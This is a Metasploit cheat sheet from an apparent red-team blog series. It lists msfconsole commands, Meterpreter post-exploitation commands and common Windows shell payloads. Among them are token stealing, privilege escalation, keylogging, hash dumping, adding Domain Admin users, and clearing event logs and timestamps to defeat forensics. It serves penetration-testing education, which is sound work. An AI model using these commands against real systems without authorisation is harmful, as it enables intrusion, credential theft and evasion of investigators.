Metasploit Cheat Sheet

Sharing is caring
This entry is part 3 of 7 in the series Red Team Engagements

Views: 39

MSFconsole Commands

CommandDescription
show exploitsShow all exploits within the Framework.
show payloadsShow all payloads within the Framework.
grep meterpreter show payloads
grep meterpreter grep reverse_tcp show payloads
MSF – Searching for Specific Payload
show auxiliaryShow all auxiliary modules within the Framework.
search <name>Search for exploits or modules within the Framework.
infoLoad information about a specific exploit or module.
use <name>Load an exploit or module (example: use windows/smb/psexec).
use <number>Load an exploit by using the index number displayed after the search command.
LHOSTYour local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
RHOSTThe remote host or the target. set function Set a specific value (for example, LHOST or RHOST).
setg <function>Set a specific value globally (for example, LHOST or RHOST).
show optionsShow the options available for a module or exploit.
show targetsShow the platforms supported by the exploit.
set target <number>Specify a specific target index if you know the OS and service pack.
set payload <payload>Specify the payload to use.
set payload <number>Specify the payload index number to use after the show payloads command.
show advancedShow advanced options.
set autorunscript migrate -fAutomatically migrate to a separate process upon exploit completion.
checkDetermine whether a target is vulnerable to an attack.
exploitExecute the module or exploit and attack the target.
exploit -jRun the exploit under the context of the job. (This will run the exploit in the background.)
exploit -zDo not interact with the session after successful exploitation.
exploit -e <encoder>Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
exploit -hDisplay help for the exploit command.
sessions -lList available sessions (used when handling multiple shells).
sessions -l -vList all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
sessions -s <script>Run a specific Meterpreter script on all Meterpreter live sessions.
sessions -KKill all live sessions.
sessions -c <cmd>Execute a command on all live Meterpreter sessions.
sessions -u <sessionID>Upgrade a normal Win32 shell to a Meterpreter console.
db_create <name>Create a database to use with database-driven attacks (example: db_create autopwn).
db_connect <name>Create and connect to a database for driven attacks (example: db_connect autopwn).
db_nmapUse Nmap and place results in a database. (Normal Nmap syntax is supported, such as –sT –v –P0.)
db_destroyDelete the current database.
db_destroy <user:password@host:port/database>Delete database using advanced options.

Meterpreter Commands

CommandDescription
helpOpen Meterpreter usage help.
run <scriptname>Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
sysinfoShow the system information on the compromised target.
lsList the files and folders on the target.
use privLoad the privilege extension for extended Meterpreter libraries.
psShow all running processes and which accounts are associated with each process.
migrate <proc. id>Migrate to the specific process ID (PID is the target process ID gained from the ps command).
use incognitoLoad incognito functions. (Used for token stealing and impersonation on a target machine.)
list_tokens -uList available tokens on the target by user.
list_tokens -gList available tokens on the target by group.
impersonate_token <DOMAIN_NAMEUSERNAME>Impersonate a token available on the target.
steal_token <proc. id>Steal the tokens available for a given process and impersonate that token.
drop_tokenStop impersonating the current token.
getsystemAttempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
shellDrop into an interactive shell with all available tokens.
execute -f <cmd.exe> -iExecute cmd.exe and interact with it.
execute -f <cmd.exe> -i -tExecute cmd.exe with all available tokens.
execute -f <cmd.exe> -i -H -tExecute cmd.exe with all available tokens and make it a hidden process.
rev2selfRevert back to the original user you used to compromise the target.
reg <command>Interact, create, delete, query, set, and much more in the target’s registry.
setdesktop <number>Switch to a different screen based on who is logged in.
screenshotTake a screenshot of the target’s screen.
upload <filename>Upload a file to the target.
download <filename>Download a file from the target.
keyscan_startStart sniffing keystrokes on the remote target.
keyscan_dumpDump the remote keys captured on the target.
keyscan_stopStop sniffing keystrokes on the remote target.
getprivsGet as many privileges as possible on the target.
uictl enable <keyboard/mouse>Take control of the keyboard and/or mouse.
backgroundRun your current Meterpreter shell in the background.
hashdumpDump all hashes on the target. use sniffer Load the sniffer module.
sniffer_interfacesList the available interfaces on the target.
sniffer_dump <interfaceID> pcapnameStart sniffing on the remote target.
sniffer_start <interfaceID> packet-bufferStart sniffing with a specific range for a packet buffer.
sniffer_stats <interfaceID>Grab statistical information from the interface you are sniffing.
sniffer_stop <interfaceID>Stop the sniffer.
add_user <username> <password> -h <ip>Add a user on the remote target.
add_group_user <"Domain Admins"> <username> -h <ip>Add a username to the Domain Administrators group on the remote target.
clearevClear the event log on the target machine.
timestompChange file attributes, such as creation date (antiforensics measure).
rebootReboot the target machine.

MSF – Payload Types (Windows)

The table below contains the most common payloads used for Windows machines and their respective descriptions.

PayloadDescription
generic/customGeneric listener, multi-use
generic/shell_bind_tcpGeneric listener, multi-use, normal shell, TCP connection binding
generic/shell_reverse_tcpGeneric listener, multi-use, normal shell, reverse TCP connection
windows/x64/execExecutes an arbitrary command (Windows x64)
windows/x64/loadlibraryLoads an arbitrary x64 library path
windows/x64/messageboxSpawns a dialog via MessageBox using a customizable title, text & icon
windows/x64/shell_reverse_tcpNormal shell, single payload, reverse TCP connection
windows/x64/shell/reverse_tcpNormal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcpNormal shell, stager + stage, IPv6 Bind TCP stager
windows/x64/meterpreter/$Meterpreter payload + varieties above
windows/x64/powershell/$Interactive PowerShell sessions + varieties above
windows/x64/vncinject/$VNC Server (Reflective Injection) + varieties above
Series Navigation<< HTTP 101THREAT EMULATION: Introduction >>